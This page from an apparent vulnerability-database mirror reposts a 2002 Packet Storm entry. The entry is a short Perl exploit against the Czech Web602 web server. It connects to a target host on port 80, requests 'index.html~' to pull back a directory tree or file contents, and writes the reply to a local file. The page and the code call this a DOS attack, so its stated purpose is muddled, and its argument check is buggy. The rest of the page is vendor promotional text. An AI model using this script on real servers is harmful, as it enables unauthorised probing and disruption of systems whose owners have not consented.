Lucene search
K

web602dir.pl

🗓️ 22 Oct 2002 00:00:00Reported by eip aka deadbeat aka AnGrY_SQlType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Perl script for exploiting Web602 Directory Tree vulnerability via DOS attack on specified host.

Code
`#/usr/bin/perl  
  
#web602 (cezch version) driectory tree exploit..  
#Written by eip aka deadbeat aka AnGrY_SQl  
  
use IO::Socket;  
print "\nWeb602 (czech version) Directory Tee Exploit\n";  
if (!$ARGV< 0) {  
print "Usage: perl $0 <host>\n";  
}  
$host = $ARGV[0];  
$sox = IO::Socket::INET->new(  
Proto=>"tcp",  
PeerPort=>"80",  
PeerAddr=>$host,  
);  
print "Connected..DOS attempt now;)\n";  
print $sox "GET /index.html~\r\n";  
open FILEHANDLE, ">crap.html";  
while(<$sox>) {  
print FILEHANDLE;  
}  
print "Done..\n";  
close FILEHANDLE;  
close $sox;   
print "Results are in crap.html\n";  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation